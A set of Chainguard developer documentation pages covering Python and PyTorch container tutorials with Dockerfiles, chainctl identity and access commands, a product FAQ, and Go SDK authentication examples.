Next, pull down the facts.txt file with curl. Inspect the URL before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your main.py script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/python/octo-facts/facts.txt At this point, you can run the script and be sure you are satisfied with the functionality. It is recommended that you use a Python programming environment. Check whether you should use the python or python3 command. python main.py You should receive the output of a randomized octopus fact. The wolfi octopus was discovered in 1913. The demo application is now ready. In the next step, you'll create a Dockerfile to run your app. Step 2: Creating the Dockerfile For this single-stage build, we'll only use one FROM line in our Dockerfile. Our resulting container will be based on the distroless Python Wolfi container image, which means it doesn't come with a package manager or even a shell. We'll begin by creating a Dockerfile. Again, you can use any code editor of your choice; we'll use Nano for demonstration purposes. nano Dockerfile The following Dockerfile will: Start a build stage based on the python:latest image; Declare the working directory; Copy the script and the text file that's being read; Set up the application as entry point for this container.
FROM cgr.dev/chainguard/python:latest
WORKDIR /octo-facts
COPY main.py facts.txt ./
ENTRYPOINT [ "python", "/octo-facts/main.py" ]
Save the file when you're finished. You can now build the container image. If you receive an error, try again with sudo. docker build . --pull -t octo-facts Once the build is finished, run the container. docker run --rm octo-facts And you should get output similar to what you got before, with a random octopus fact. Octopuses can breathe and see through their skin. You have successfully completed the single-stage Python Chainguard Container. At this point, you can continue to the multi-stage example or advanced usage. Example 2 — Multi-Stage Build for Python Chainguard Container In this example, we'll build and run a multi-stage Python Chainguard Container. We'll have a build image that includes pip and a shell before creating a final distroless image without these development tools for production. Step 1: Setting up a Demo Application We'll start by creating a Python application that will take in an image file and convert it to ANSI escape sequences on the CLI to render an image. To begin, create a directory for your app. You can use any meaningful name and path that resonates with you; our example will use linky/. mkdir ~/linky/ && cd $_ We'll first write out the requirements for our app in a new file; in this example we named the file requirements.txt. You can edit this file in your preferred code editor, in our case we will use Nano. nano requirements.txt We'll pin the version of Python setuptools and also install climage; pinning setuptools to a known-good version helps avoid compatibility issues with climage. Add the following text to the file: setuptools==70.0.0 climage==0.2.0 Save the file. Next, we will create a new file called linky.py to hold our Python code. You can edit this file in whatever code editor you would like. We'll use Nano as an example.
nano linky.py Add the following Python code which defines a CLI app that takes in an image file, linky.png, and prints a representation of that file to the terminal:
'''import climage module to display images on terminal'''
from climage import convert

def main():
    '''Take in PNG and output as ANSI to terminal'''
    output = convert('linky.png', is_unicode=True)
    print(output)

if __name__ == "__main__":
    main()
Next, pull down the linky.png image file with curl. Inspect the URL before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your linky.py script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/python/linky/linky.png If you have python and pip installed in your local environment, you can now install the dependencies with pip and run our program. Don't worry if you don't have Python installed; you can simply skip this step and move on to the Dockerfile. pip install -r requirements.txt python linky.py You'll receive a representation of the Chainguard Linky logo on the command line. With your demo application ready, you're ready to move on to the container stage. Step 2: Creating the Dockerfile To make sure our final container is distroless while still being able to install dependencies with pip, our build will consist of two stages: first, we'll build the application using the python:latest-dev image variant, a Wolfi-based image that includes pip and other useful tools for development. Then, we'll create a separate stage for the final image. The resulting container will be based on the distroless Python Wolfi container image, which means it doesn't come with pip or even a shell. Begin by editing a Dockerfile, with Nano for instance. nano Dockerfile The following Dockerfile will: Start a new build stage based on the python:latest-dev container image and call it builder; Create a new virtual environment to cleanly hold the application's dependencies; Copy requirements.txt from the current directory to the /linky location in the container; Run pip install --no-cache-dir -r requirements.txt to install dependencies; Start a new build stage based on the python:latest image; Copy the dependencies in the virtual environment from the builder stage, and the source code from the current directory; Set up the application as the entry point for this container. Copy this configuration to your own Dockerfile:
FROM cgr.dev/chainguard/python:latest-dev AS builder
ENV LANG=C.UTF-8
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1
ENV PATH="/linky/venv/bin:$PATH"
WORKDIR /linky
RUN python -m venv /linky/venv
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

FROM cgr.dev/chainguard/python:latest
WORKDIR /linky
ENV PYTHONUNBUFFERED=1
ENV PATH="/venv/bin:$PATH"
COPY linky.py linky.png ./
COPY --from=builder /linky/venv /venv
ENTRYPOINT [ "python", "/linky/linky.py" ]
Save the file when you're finished. You can now build the container image. If you receive a permission error, try running under sudo. docker build . --pull -t linky Once the build is finished, run the image with: docker run --rm linky And you should get output similar to what you got before, with a printed Linky on the command line. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Python Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository.
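One quick way to check package availability is to run a search from a wolfi-base container, which ships with apk and a shell. This is a rough sketch, not the only approach; the package name jq is only an illustrative example, and you can also browse the Wolfi OS repository on GitHub directly:

```sh
# Refresh the package index, then search Wolfi for a package (replace "jq" with the package you need)
docker run --rm cgr.dev/chainguard/wolfi-base \
  sh -c "apk update && apk search jq"
```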
Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk add you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as the base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Manage Identity and Access with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-iam/ Last Modified: May 13, 2025 Tags: chainctl, iam, Product, authentication, access, identity, management Identity and access management (IAM) enables your organization to control access to various resources and actions. This page demonstrates how to use the chainctl iam command to perform the most common tasks. For the following, assume that returned information only includes that which your account has permissions to view. Also, actions such as create and delete are similarly limited. This page is intended as an introductory overview of IAM with chainctl. For a full reference of all commands with details and switches, see chainctl Reference. List Folders Folders contain the catalogs of things your organization has access to. Find out what folders are available to your organization with: chainctl iam folders list $ORGANIZATION_NAME For example, for our Developer Enablement team, which uses the chainguard.edu organization, the interaction looks like this: $ chainctl iam folders list chainguard.edu [chainguard.edu] Developer Enablement images catalog This command can also delete, describe, and update folders by replacing list with delete, describe, or update. See the reference guide for more details. List and Describe Identities To list all of the existing identities along with roles, types, and more, use: chainctl iam identities list Because this command requests a large amount of information, you may find it useful to direct the output into a file or pipe it into a filter. If you know the specific IDENTITY_NAME or IDENTITY_ID that you want to know more about, use: chainctl iam identities describe {IDENTITY_NAME | IDENTITY_ID} This command can also create, delete, describe, and update identities by replacing list with create, delete, describe, or update. See the reference guide for more details. List and Create Identity Providers This command enables you to manage your own identity management provider, such as a custom OIDC provider. To list all currently configured identity management providers, use: chainctl iam identity-providers list This command can also create, delete, and update your organization's identity providers by replacing list with create, delete, or update. See the reference guide for more details. To tell chainctl about your OIDC provider and enable users to start using it, use create: chainctl iam identity-provider create --name=google --parent=example \ --oidc-issuer=https://accounts.google.com \ --oidc-client-id=foo \ --oidc-client-secret=bar \ --default-role=viewer List and Create Invites This command lets you manage invite codes that register identities with Chainguard.
To list current invites, use: chainctl iam invites list This will return a list of invites by ID with information about the invite’s expiration date, associated roles, and keyID. This command can also create and delete invites by replacing list with create or delete. See the reference guide for more details. To create a new invite, use create, like in this example that defines a role, an email address to tie the invite to, the valid length of the invitation, and that it can only be used once: chainctl iam invite create ORGANIZATION_NAME --role=viewer --email=sandra@organization.dev --ttl=7d --single-use List organizations To list all of the organizations your account is associated with, use: chainctl iam organizations list Most users will only be associated with one organization, but admin and support users may find using this command especially useful to determine whether they have needed permissions to interact with specific organizations when help is needed. This command can also delete and describe organizations by replacing list with delete or describe. See the reference guide for more details. List roles To list all of the roles your account is associated with, use: chainctl iam roles list This command can also create, delete, and update identities by replacing list with create, delete or update. It is possible to define role details during creation or create a role interactively. To create a role interactively, use: chainctl iam roles create ROLE_NAME To find out what actions can be done by each role, use: chainctl iam roles capabilities list This returns a list like this sample: $ chainctl iam roles capabilities list RESOURCE | ACTION -------------------------+----------------------------------------- account_associations | create, delete, list, update attestations | list build_report | list clusters | create, delete, discover, list, update group_invites | create, delete, list groups | create, delete, list, update identity | create, delete, list, update identity_providers | create, delete, list, update libraries.entitlements | create, delete, list libraries.java | list libraries.python | list manifest | create, delete, list, update manifest.metadata | list namespaces | list nodes | list policy | create, delete, list, update record_contexts | list record_policy_results | list record_signatures | list records | list registry.entitlements | list repo | create, delete, list, update risks | list role_bindings | create, delete, list, update roles | create, delete, list, update sboms | list sigstore | create, delete, list, update sigstore.certificate | create subscriptions | create, delete, list, update tag | create, delete, list, update version | list vuln | create vuln_report | create, list vuln_reports | list workloads | list To find out about role bindings, use: chainctl iam role-bindings list The chainctl iam role-bindings command can also create, delete, and update identities by replacing list with create, delete or update. --- ### Getting Started with the PyTorch Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/pytorch/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product, AI Chainguard offers a minimal, low-CVE container image for deep learning with PyTorch that includes support for the CUDA parallel computing platform for performing computation on supported GPUs. 
This introductory guide to Chainguard’s pytorch container image will walk you through fine-tuning an image classification model, saving the model, and running it securely for inference. We’ll also compare the security and footprint of the PyTorch Chainguard Container to the official runtime container image distributed by PyTorch and present ways to adapt the resources in this tutorial to your own deep learning projects powered by PyTorch. What is Deep Learning? Deep learning is a subset of machine learning that leverages a flexible computational architecture, the neural network, to address a wide variety of tasks. Neural networks emulate the structure of the brain and consist of interconnected nodes (neurons) that each contain an associated weight and threshold. In concert with an activation function, these values determine whether data is propagated within the network, producing an output layer corresponding to a classification, regression, or other result. By technical convention, a deep neural network (DNN) has at least three layers: an input layer, an output layer, and one or more hidden layers. In practice, DNNs often have many layers. Deep neural networks underpin many common computational tasks in modern applications, such as speech to text and generative AI. Setting up CUDA Compute Unified Device Architecture (CUDA) is a parallel computing platform developed by NVIDIA. To take advantage of connected GPUs, you’ll need to follow the setup instructions for your local machine or create a CUDA-enabled instance on a cloud provider. To set up CUDA on your local machine, follow the installation instructions for Linux or Windows. CUDA is not currently supported on Mac OS. Google Cloud Platform provides CUDA-ready deep learning instances, including PyTorch-specific instructions. Amazon Web Services also provides CUDA-ready deep learning instances. This guide is designed for use in an environment with access to one or more NVIDIA GPUs. However, the code below is written to also run in a CPU-only environment. Please note that tuning the model will take significantly longer in a CPU-only environment. Testing Access to GPUs Our first step is to check whether our PyTorch-CUDA environment has access to connected GPUs. If you don’t already have Docker Engine installed, follow the instructions for installing Docker Engine on your host machine. Run the below command to pull the container image, run it with GPU access, and start a Python interpreter inside the running container. docker run --rm -it \ --gpus all \ cgr.dev/chainguard/pytorch:latest Running the above for the first time may take a few minutes to pull the pytorch Chainguard Container, currently 3.3GB. Once the image runs, you will be interacting with a Python interpreter in the running container. Enter the following commands at the prompt to check the availability of your GPU. Python 3.11.9 (main, Apr 2 2024, 15:40:32) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import torch >>> torch.cuda.is_available() True >>> torch.cuda.device_count() 1 >>> torch.cuda.get_device_name(0) 'Tesla V100-SXM2-16GB' If the CUDA computing environment is accessible to PyTorch, torch.cuda.is_available() will return True. You should also check that at least one GPU is connected. If your environment only has access to CPU, you can complete the rest of this tutorial, but the step of fine-tuning the pretrained model will take significantly longer. 
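The tutorial code relies on the standard PyTorch pattern of selecting a device at runtime, which is why the same script can run with or without a GPU. Independent of the specific training script used here, that pattern looks roughly like this sketch:

```python
import torch

# Use the first visible CUDA GPU when one is available; otherwise fall back to the CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"Using device: {device}")

# Models and tensors are then moved to the chosen device before use, for example:
example_batch = torch.randn(4, 3, 224, 224).to(device)
```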
Once you’ve determined that your environment has access to CUDA and connected GPUs, exit the container by typing Control-d or by typing exit() and pressing Enter. You should be returned to the prompt of your host machine. Training and Inference Overview A common workflow in deep learning is to collect labeled data, train a model using that data, and store the model. Later, this model can be loaded and used for inference, or making predictions based on novel inputs not in the training set. For example, we might train a model to recognize animals, then store the model as a serialized and compressed file. Later, and possibly in a new environment, we can load the model and use it to perform a classification task on novel data, such as an image of a whale provided by a user. It is common for model training to be performed in a development environment, and for inference to be performed in a production environment. We will follow this assumption in this tutorial, but be mindful not to use privileged access or root users in production. In this tutorial, we’ll fine-tune a pretrained model for an image classification task: classifying whether a provided image is an octopus 🐙, a whale 🐳, or a penguin 🐧. We’ve chosen these animals in appreciation of Wolfi and Chainguard, Docker, and Linux, respectively. Rather than train a model from scratch, a process that requires a large set of input data, we’ll start with a ResNet model with 18 layers (resnet18). Using a fine-tuning approach with a pretrained model with relatively few layers is appropriate when using a limited amount of input data. In our case, we’ll be using 60 images for each class, further divided into 40 training and 20 validation images. For the training step, we’ll be accessing the container image as root. This allows us to save the model to a volume and preserve it on the host system. In our inference step, we’ll access the container as the nonroot user, an approach that will be more secure for a production use case. Fine-Tuning the Model In this section, we’ll download prepared data to your environment, download a model training script, and run the script to train and save the model. These tasks will all be performed by running the below command. Further details on the Docker command, input data, and script are provided later in the section. First check that curl and tar are available on your system, and install them if necessary. Docker Engine will also need to be installed. Run the following to download necessary files and train the model. If there is an issue with the command, see the manual step-by-step instructions below. Note: if you’re following this tutorial in an environment without access to GPU, remove the --gpus all \ line below before running. mkdir image_classification && cd image_classification curl https://codeload.github.com/chainguard-dev/pytorch-getting-started/tar.gz/main | \ tar -xz --strip=1 pytorch-getting-started-main/ && \ docker run --user root --rm -it \ --gpus all \ -v "$PWD/:/home/nonroot/octopus-detector" \ cgr.dev/chainguard/pytorch:latest \ "/home/nonroot/octopus-detector/image_classification.py" The above command creates a new folder, image_classification, and changes the working directory to that folder. It then uses curl to download the training script and training and validation images from GitHub as a tar file and extracts the files. A container based on the pytorch container image is then created and the script and data are shared between host and container in a volume. 
The model is trained using the provided script and data, and the resulting model is saved to the volume. Training should take 1-3 minutes in a GPU-equipped environment, and 20-30 minutes in a CPU-only environment. Once the command completes, you can check your current working directory for a trained model as a .pt file: $ ls README.md image_classification.py data octopus_whale_penguin_model.pt Manual Steps to Fine-Tune the Model Below are manual steps to perform the above download and training procedure interactively. You may wish to follow these steps if you need to modify the above for your own use case, if you’d like to better understand the steps involved, or if you have difficulty running the above command in your environment. These steps use git clone rather than curl. Also note that this manual process uses the :latest-dev version of the container image, since the :latest container image does not include shells such as bash for increased security. In the below steps, the prompt of your host machine will be denoted as (host) $, while the prompt of the container machine will be denoted as (container) $ Check that you have Git and Docker installed: (host) $ git --version git version 2.30.2 (host) $ docker --version Docker version 20.10.17, build 100c701 Clone the repository with the training and validation data and the training script and cd into the cloned repository: (host) $ git clone https://github.com/chainguard-dev/pytorch-getting-started.git (host) $ cd pytorch-getting-started Run the below command to start an interactive session in a running pytorch Chainguard Container with root access. If your environment doesn’t have access to GPU, remove the --gpus all \ line before running. Note the volume option, which creates a volume on the container based on the current working directory, allowing access to our training script and data inside the container. Remember that this guide assumes you are training the model in a controlled development environment—do not use root access in any production senario. (host) $ docker run --user root --rm -it \ --gpus all \ --entrypoint bash \ -v "$PWD/:/home/nonroot/octopus-detector" \ cgr.dev/chainguard/pytorch:latest-dev You should now have access to an interactive shell inside the container. Navigate to the created volume: (container) $ cd /home/nonroot/octopus-detector/ (container) $ pwd /home/nonroot/octopus-detector Run the model-training script: (container) $ python image_classification.py Downloading: "https://download.pytorch.org/models/resnet18-f37072fd.pth" to /root/.cache/torch/hub/checkpoints/resnet18-f37072fd.pth 100.0% 🐙 Epoch 0/24 🐳 train Loss: 0.9276 Acc: 0.5583 🐧 val Loss: 0.2275 Acc: 0.9500 [...] 🐙 Epoch 24/24 🐳 train Loss: 0.1940 Acc: 0.9167 🐧 val Loss: 0.0248 Acc: 1.0000 Training complete in 1m 39s Best val Acc: 1.000000 If the script ran successfully, you should have a saved model serialized as a .pt file in the current working directory: (container) $ ls octopus_whale_penguin_model.pt data image_classification.py At this point, you’ve trained your model. Shut down the container by pressing Control-d or by typing exit and pressing Enter. Since we used a volume, the model should also be present on the host machine: (host) $ ls octopus_whale_penguin_model.pt image_classification.py data Running Inference You have now downloaded the resnet18 pretrained model and fine-tuned it to detect three classes of images: octopuses, whales, and penguins. 
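Before running inference, it helps to know what the saved .pt file represents. Saving and later reloading a fine-tuned model of this kind generally comes down to a pair of calls like the following sketch. This is not the guide's script itself, and the exact serialization may differ (for example, a script could save the full model object rather than a state_dict), but it shows the general mechanism:

```python
import torch
import torch.nn as nn
from torchvision import models

# Rebuild the fine-tuned architecture: ResNet-18 with a three-class head
# (octopus, whale, penguin).
model = models.resnet18()
model.fc = nn.Linear(model.fc.in_features, 3)

# After training, persist the learned weights...
torch.save(model.state_dict(), "octopus_whale_penguin_model.pt")

# ...and reload them later, for example in an inference environment.
model.load_state_dict(torch.load("octopus_whale_penguin_model.pt", map_location="cpu"))
model.eval()  # disable training-only behavior such as dropout before inference
```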
Now that the model is trained, we can load it, pass in a new image, and receive the model’s prediction. Using an existing model for prediction is called inference, and in many common scenarios inference is run in a production environment. For this reason, we’ll access our existing model with the nonroot user in this section. The script (image_classification.py) run in the above commands has been written to check if a model exists in the same folder and, if present, load it. It will also perform inference if a path to an image is passed as an argument when the script is run. Since we should now have a model file present on our host machine, let’s go ahead and run inference on a new image of an octopus. Feel free to find your own image of an octopus on the web, or run the below command to download an image not in the training data. The training data used realistic images, so you may not wish to choose, for example, a stylized or cartoon image of an octopus. curl https://raw.githubusercontent.com/chainguard-dev/pytorch-getting-started/main/inference-images/octopus.jpg > octopus.jpg Now that we have a novel input, let’s run inference to classify the image: docker run --rm -it \ --gpus all \ -v "$PWD/:/home/nonroot/octopus-detector" \ cgr.dev/chainguard/pytorch:latest \ "/home/nonroot/octopus-detector/image_classification.py" \ "/home/nonroot/octopus-detector/octopus.jpg" After running this, you should see the model’s classification of the image as output: octopus Feel free to try the above inference on other images of octopuses, whales, and penguins. The model should have high accuracy for images similar to those in the training set, which consists of photorealistic images. Notes on the Script In this section, we’ll review the script provided in the above steps, highlighting some common options and approaches and a few ways the script might be adapted to other use cases. Deep learning is a complex and emerging field, so this section can only provide a high-level overview and a few recommendations for moving forward. To fine-tune a model for image classification as we did here, you can replace the provided training and validation data with your own. The script examines the number of folders in the training set to determine the targeted number of classes. The folder names are used as class labels. We used 40 training and 20 validation images for each class, but a ratio of 5:1 training to validation may also produce good results. By fine-tuning a pretrained model, we took advantage of transfer learning, meaning that the pretrained model (resnet18) was already trained on inputs with relevance to our classification task. Because we used transfer learning, the relatively small amount of input data was still sufficient for good accuracy in our fine-tuned model. If you’re working with a large amount of input data, you might consider using a larger pretrained model, such as resnet34. In addition, if training using significantly more data or training using limited computation relative to the task, you may consider the more efficient convolutional neural network as fixed feature extractor approach, which trains only one attached layer rather than updates the original model. PyTorch maintains a set of guides that are frequently updated. These provide a good starting point when undertaking a new project in PyTorch. If you’re new to the field of deep learning, the book Deep Learning for Coders with Fastai and PyTorch hosts freely available materials on GitHub. 
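If you want to experiment with the fixed feature extractor approach mentioned above, the core idea in PyTorch is to freeze the pretrained backbone and attach a new, trainable final layer. The following is a minimal sketch rather than the guide's training script; it assumes a recent torchvision (older versions use pretrained=True instead of the weights argument):

```python
import torch
import torch.nn as nn
from torchvision import models

# Load a pretrained ResNet-18 and freeze its weights so they are not updated during training.
model = models.resnet18(weights=models.ResNet18_Weights.DEFAULT)
for param in model.parameters():
    param.requires_grad = False

# Replace the final fully connected layer with a new head for three classes;
# only this layer's parameters will be trained.
model.fc = nn.Linear(model.fc.in_features, 3)

# The optimizer is then given only the new layer's parameters.
optimizer = torch.optim.SGD(model.fc.parameters(), lr=0.001, momentum=0.9)
```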
--- ### Chainguard Containers FAQs URL: https://edu.chainguard.dev/chainguard/chainguard-images/faq/ Last Modified: December 18, 2024 Tags: Chainguard Containers, FAQ, Product Learn answers to your questions about Chainguard Containers. Which Linux distribution is used as base for Chainguard Containers? Chainguard Containers are based on Wolfi, a Linux undistro we built specifically to address software supply chain security issues. We call it an undistro because it doesn’t contain certain software you’d normally find in a traditional Linux distribution such as Debian or Alpine. Wolfi is a minimal Linux distribution designed specifically to be used as a base for stripped-down container images. How do Chainguard Containers relate to the Google Distroless Container Images? The Google distroless images follow a similar philosophy to many of our images: they are minimal images that don’t include package managers or shells. The main difference is in the implementation. The Google distroless images are built with Bazel and based on the Debian distribution, whereas Chainguard Containers are built with apko and based on Wolfi. We believe our approach is more maintainable and extensible. Which images are available? There are currently over a thousand Chainguard Containers available, which are segmented as Starter or Production. You can read more about this in the next question. Chainguard Containers are primarily available from Chainguard’s registry, but a selection of Starter images is also available on Docker Hub. You can find the complete list of available Chainguard Containers in our public Containers Directory or within the Chainguard Console. What options do I have to use Chainguard Containers? You can get free Chainguard Containers for your organization. You can also upgrade for more versions, SLAs, and dedicated support. Starter Production Free for everyone, anywhere Contact us for pricing Latest versions Major and minor versions Community support Enterprise SLAs Developer Docs Customer support You can read more about the differences between Starter and Production Containers in our Containers Overview. Are Chainguard Containers available on Docker Hub? Yes, Chainguard Starter Container images are available on Docker Hub. As a Docker Verified Publisher, Chainguard has met Docker’s stringent standards for security, quality, and transparency. This status signifies that our container images are trusted, reliable, and have undergone rigorous verification processes. If you wish to use Production Containers, you will use Chainguard’s registry. What is an SBOM and why is it important? An SBOM is a Software Bill of Materials, which is a list containing detailed information about all software that is included within a software artifact, whether it’s an application, a container image, or a physical appliance. SBOMs provide visibility into the software you depend on. They can allow automated systems to quickly identify issues such as unpatched vulnerabilities, since SBOMs typically include the version of each dependency listed. Who maintains Chainguard Containers? Chainguard Containers are officially maintained by Chainguard engineers. How often are Chainguard Containers updated? Chainguard Containers are rebuilt every night to ensure that new package versions and security updates in upstream Wolfi are quickly applied. Can I simply replace my current base image with a Chainguard Container and it will work out of the box? 
Chainguard Containers are designed to be minimal, and many of them don’t come with a package manager. Depending on your stack and specific dependencies, you may need to include additional software by combining -dev container images and our distroless images in a multi-stage Docker build. What packages are available in Chainguard Containers? Chainguard Containers only contain packages that come from the Wolfi Project or those that are built and maintained internally by Chainguard. Starting in March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These will track the latest version of the upstream software in the package. Chainguard will end patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. The tools we use to build packages and images remain freely available and open source in Wolfi. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our customers. Note that specific package versions can be made available in Production containers. If you have a request for a specific package version, please contact us. What does Chainguard do when a CVE is published, but a patch is not available from the owner of the OSS code? Chainguard investigates the CVE and marks relevant images as affected or not. If Chainguard can identify a patch that’s unreleased, Chainguard may apply a patch before it lands upstream. In either case, when the patch lands upstream, Chainguard picks it up and rolls it out. I added software on top of one of Chainguard’s base container images, why are there CVEs? Chainguard is not responsible for CVEs in software you add on top of base images. Do I need to authenticate into Chainguard to use Chainguard Containers? Logging in is optional if you are only using Starter containers. That being said, there are benefits for all users who authenticate to Chainguard’s registry, as Chainguard provides notifications of version updates, breaking changes, or critical security updates. To learn how to authenticate into Chainguard’s registry, you can review our authentication documentation . You can read more about the thought process behind authentication in our blog post, Scaling Chainguard Containers with a growing catalog and proactive security updates. Is Chainguard FedRAMP certified? You will need to ingest Chainguard Containers into an image repository within your FedRAMP boundary. Your repo requires FedRAMP but Chainguard does not since we’re outside the boundary. Please reach out if you need more details. --- ### Authenticating with the Chainguard SDK URL: https://edu.chainguard.dev/chainguard/administration/sdk-authentication/ Last Modified: June 4, 2025 Tags: Product, Procedural There are several ways for users to interact with the Chainguard platform, with chainctl (Chainguard’s command-line tool) and the Chainguard Console (Chainguard’s web interface) being the two most commonly-used methods. However, both of these require a human user to authenticate, and aren’t useful for working with Chainguard resources programmatically. The Chainguard SDK serves to ease programmatic integration with the Chainguard platform. This guide highlights two examples from the SDK repository that show how to authenticate to the Chainguard registry using the chainguard.dev/sdk/auth and chainguard.dev/sdk/auth/ggcr packages. 
The first has you authenticate as a local user, while the second has you authenticate as an assumed identity. For more information about the examples highlighted in this guide, refer to the examples folder in the SDK repository. Prerequisites To follow along with this guide you must have Go installed to run the provided examples, which are written in Golang. Additionally, it may help to run these examples from a temporary directory, like /tmp so the code is automatically removed from your system the next time it boots: cd /tmp Example 1 — Authenticate Using Local Credentials The first example from the SDK repository we will go over is the chainctl example. This example shows how to use a token source backed by chainctl — Chainguard’s command-line tool — to access the Chainguard registry using local credentials. The chainctl example consists of the following Go code in a main.go file (with comments removed): package main import ( "context" "encoding/json" "log" "os" "chainguard.dev/sdk/auth" "chainguard.dev/sdk/auth/ggcr" "github.com/google/go-containerregistry/pkg/name" "github.com/google/go-containerregistry/pkg/v1/remote" ) func main() { ctx := context.Background() ts := auth.NewChainctlTokenSource(ctx, auth.WithAudience("cgr.dev")) desc, err := remote.Get(name.MustParseReference("cgr.dev/chainguard/static"), remote.WithAuthFromKeychain(ggcr.TokenSourceKeychain(ts))) if err != nil { log.Fatalf("error getting reference: %v", err) } enc := json.NewEncoder(os.Stdout) enc.SetIndent("", " ") _ = enc.Encode(desc) } This code works by executing the chainctl binary to retrieve a token and making a call directly to the registry. Specifically, it does the following things: It imports some packages, including the Chainguard SDK’s auth and auth/ggcr packages. These are what allow the program to interact with the Chainguard registry. The example uses the auth package to execute the chainctl CLI binary to retrieve a token based on the local user’s credentials. Using this token, the example makes a call to the Chainguard registry to retrieve some information about the supplied image. The example uses the cgr.dev/chainguard/static Starter image. To run this example, save the main.go file to your local machine. Then run the following commands: go mod init github.com/chainguard-dev/sdk && go mod tidy The go mod init command will initialize a new go.mod file in the current directory. Including the github.com/chainguard-dev/sdk URL tells Go to use that as the module path. The go mod tidy command ensures that the new go.mod file matches the source code in the module. 
Following that, execute the program with go run: go run main.go This will return output like the following: { "mediaType": "application/vnd.oci.image.index.v1+json", "size": 925, "digest": "sha256:633aabd19a2d1b9d4ccc1f4b704eb5e9d34ce6ad231a4f5b7f7a3af1307fdba8", "Manifest": "eyJzY2hlbWFWZXJzaW9uIjoyLCJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLmluZGV4LnYxK2pzb24iLCJtYW5pZmVzdHMiOlt7Im1lZGlhVHlwZSI6ImFwcGxpY2F0aW9uL3ZuZC5vY2kuaW1hZ2UubWFuaWZlc3QudjEranNvbiIsInNpemUiOjgzOCwiZGlnZXN0Ijoic2hhMjU2OmJiMmRlMjU3MjFlMTE3Zjg4MDYwYjgyZGQ2YWQ1M2Y4ODdlZTgwOWU1MzE1Y2Y0MWEwMGNkOGExM2ZhMjMwNzciLCJwbGF0Zm9ybSI6eyJhcmNoaXRlY3R1cmUiOiJhbWQ2NCIsIm9zIjoibGludXgifX0seyJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLm1hbmlmZXN0LnYxK2pzb24iLCJzaXplIjo4MzgsImRpZ2VzdCI6InNoYTI1NjoxMmVjMWU3NDg0NmVhNDM1OTNkNmExMzMwZGEyOGVkNGQzNmRmNThhMTg2NGQwOTE1MjRlM2IwYTk5MDY4Y2QzIiwicGxhdGZvcm0iOnsiYXJjaGl0ZWN0dXJlIjoiYXJtNjQiLCJvcyI6ImxpbnV4In19XSwiYW5ub3RhdGlvbnMiOnsiZGV2LmNoYWluZ3VhcmQucGFja2FnZS5tYWluIjoiIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmF1dGhvcnMiOiJDaGFpbmd1YXJkIFRlYW0gaHR0cHM6Ly93d3cuY2hhaW5ndWFyZC5kZXYvIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmNyZWF0ZWQiOiIyMDI1LTA1LTI4VDEzOjM1OjQ4WiIsIm9yZy5vcGVuY29udGFpbmVycy5pbWFnZS5zb3VyY2UiOiJodHRwczovL2dpdGh1Yi5jb20vY2hhaW5ndWFyZC1pbWFnZXMvaW1hZ2VzL3RyZWUvbWFpbi9pbWFnZXMvc3RhdGljIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLnVybCI6Imh0dHBzOi8vaW1hZ2VzLmNoYWluZ3VhcmQuZGV2L2RpcmVjdG9yeS9pbWFnZS9zdGF0aWMvb3ZlcnZpZXciLCJvcmcub3BlbmNvbnRhaW5lcnMuaW1hZ2UudmVuZG9yIjoiQ2hhaW5ndWFyZCJ9fQ==" } The example returns the image’s digest and the OCI manifest data. This proves that you’ve gotten a response back from the registry and that authentication worked as expected. This example doesn’t really reflect a real-world use case, as users will generally access cgr.dev/chainguard container repositories without authenticating. However, by presenting a token it will trigger the authentication checks, making this example useful for illustrating how this can be done with the Chainguard SDK. You can experiment with updating this example to retrieve information about a different Chainguard container image by changing the cgr.dev/chainguard/static value in the main() function. You could replace this with any Chainguard repository you have access to, and the example will return information about that image. Example 2 — Authenticate with an Assumed Identity The exchange example demonstrates how to exchange a token for an assumed identity to access the registry. This example consists of the following Go code in a main.go file (with comments removed): package main import ( "context" "encoding/json" "log" "os" "chainguard.dev/sdk/auth" "chainguard.dev/sdk/auth/ggcr" "github.com/google/go-containerregistry/pkg/name" "github.com/google/go-containerregistry/pkg/v1/remote" ) const ( sub = "720909c9f5279097d847ad02a2f24ba8f59de36a/a033a6fabe0bfa0d" ) func main() { ctx := context.Background() ts := auth.NewChainctlTokenSource(ctx) desc, err := remote.Get(name.MustParseReference("cgr.dev/chainguard/static"), remote.WithAuthFromKeychain(ggcr.Keychain(sub, ts))) if err != nil { log.Fatalf("error getting reference: %v", err) } enc := json.NewEncoder(os.Stdout) enc.SetIndent("", " ") _ = enc.Encode(desc) } This example is similar to the previus one, but has the following differences: It creates a constant named sub. In this example, the sub constant’s value is set to the UIDP of a Chainguard identity named all-users which can be assumed by any Chainguard user. 
